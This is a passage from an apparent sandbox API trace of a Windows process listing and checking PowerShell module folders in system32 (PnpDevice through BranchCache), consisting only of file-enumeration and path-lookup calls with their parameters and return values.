ftLastWriteTime.dwLowDateTime=0xcbfcfdb9, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PnpDevice", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8bbe908, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xcc02299f, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrintManagement", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf8cc9a10, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProcessMitigations", cAlternateFileName="")) returned 1 [0263.075] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0x40134965, ftLastWriteTime.dwHighDateTime=0x1d61756, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Provisioning", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDesiredStateConfiguration", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xbe25506, ftLastWriteTime.dwHighDateTime=0x1d5ace1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSDiagnostics", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc090661, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSScheduledJob", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc090661, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflow", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc0b3f52, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PSWorkflowUtility", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1cca45, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc0b3f52, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ScheduledTasks", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b1f2a21, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SecureBoot", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b2652f0, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b2652f0, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbWitness", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x9b2652f0, ftLastAccessTime.dwHighDateTime=0x1d94212, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StartLayout", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89ddd70, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc0d7d12, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Storage", cAlternateFileName="")) returned 1 [0263.076] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc0d7d12, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc0d7d12, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="StorageBusCache", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TLS", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TroubleshootingPack", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TrustedPlatformModule", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x744502b, ftLastAccessTime.dwHighDateTime=0x1d5ace4, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UEV", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VpnClient", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc112c5e, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc112c5e, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wdac", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Whea", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc112c5e, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc112c5e, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsDeveloperLicense", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc12a589, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc12a589, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsErrorReporting", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa16ad38d, ftLastAccessTime.dwHighDateTime=0x1d5ace3, ftLastWriteTime.dwLowDateTime=0xa16ad38d, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsSearch", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc8a03f95, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xcc12a589, ftLastAccessTime.dwHighDateTime=0x1d5acde, ftLastWriteTime.dwLowDateTime=0xcc12a589, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsUpdate", cAlternateFileName="")) returned 1 [0263.077] FindNextFileW (in: hFindFile=0x1acc7510, lpFindFileData=0x1b83e420 | out: lpFindFileData=0x1b83e420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0263.078] FindClose (in: hFindFile=0x1acc7510 | out: hFindFile=0x1acc7510) returned 1 [0263.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e348) returned 1 [0263.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e568) returned 1 [0263.080] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psd1")) returned 0xffffffff [0263.080] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.psm1")) returned 0xffffffff [0263.080] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.cdxml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.cdxml")) returned 0xffffffff [0263.081] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.xaml")) returned 0xffffffff [0263.081] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.ni.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.ni.dll")) returned 0xffffffff [0263.081] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Modules.dll" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\modules.dll")) returned 0xffffffff [0263.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0263.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x45, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0263.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.081] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0263.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0263.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.082] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0263.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x3e, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", lpFilePart=0x0) returned 0x3d [0263.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.083] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x38 [0263.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", nBufferLength=0x38, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx", lpFilePart=0x0) returned 0x37 [0263.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.083] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Appx" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appx"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xa16872ee, ftLastWriteTime.dwHighDateTime=0x1d5ace3, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x42 [0263.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", nBufferLength=0x42, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess", lpFilePart=0x0) returned 0x41 [0263.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AssignedAccess" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\assignedaccess"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0263.087] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", nBufferLength=0x3d, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker", lpFilePart=0x0) returned 0x3c [0263.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.087] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitLocker" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitlocker"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x40 [0263.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", nBufferLength=0x40, lpBuffer=0x1a83e800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer", lpFilePart=0x0) returned 0x3f [0263.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b83e3c8) returned 1 [0263.088] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BitsTransfer" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\bitstransfer"), fInfoLevelId=0x0, lpFileInformation=0x1b83e6f0 | out: lpFileInformation=0x1b83e6f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x1fc2682, ftLastAccessTime.dwHighDateTime=0x1d942b2, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0263.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b83e378) returned 1 [0263.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\BranchCache", nBufferLength=0x0, 